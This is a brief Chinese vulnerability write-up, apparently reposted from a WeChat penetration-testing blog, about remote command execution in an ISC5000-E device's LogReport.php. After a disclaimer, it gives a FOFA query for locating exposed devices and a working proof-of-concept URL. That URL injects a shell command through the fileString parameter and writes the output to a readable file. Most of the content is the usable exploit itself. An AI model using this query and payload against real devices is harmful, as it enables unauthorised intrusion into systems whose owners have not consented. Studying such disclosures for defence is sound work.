浙江*视科技 ISC LogReport.php 远程命令执行漏洞

admin 2023年12月12日16:27:09评论72 views字数 398阅读1分19秒阅读模式


一、免责声明:


      本次文章仅限个人学习使用,如有非法用途均与作者无关,且行且珍惜;由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除整改并向您致以歉意。谢谢!


二、产品介绍:


浙江*视科技  ISC LogReport.php 远程命令执行漏洞

三、资产梳理


fofa: title=="ISC5000-E"

四、漏洞复现:


执行id命令,执行结果在1.txt中

http://target/Interface/LogReport/LogReport.php?action=execUpdate&fileString=x%3bid%3e1.txt

浙江*视科技  ISC LogReport.php 远程命令执行漏洞

查看执行结果:

http://target/Interface/LogReport/1.txt

浙江*视科技  ISC LogReport.php 远程命令执行漏洞




原文始发于微信公众号(fly的渗透学习笔记):浙江*视科技 ISC LogReport.php 远程命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月12日16:27:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   浙江*视科技 ISC LogReport.php 远程命令执行漏洞https://cn-sec.com/archives/2290756.html

发表评论

匿名网友 填写信息